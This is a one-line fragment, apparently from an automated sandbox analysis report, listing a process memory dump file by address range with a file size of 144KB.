  • memory/4992-74-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB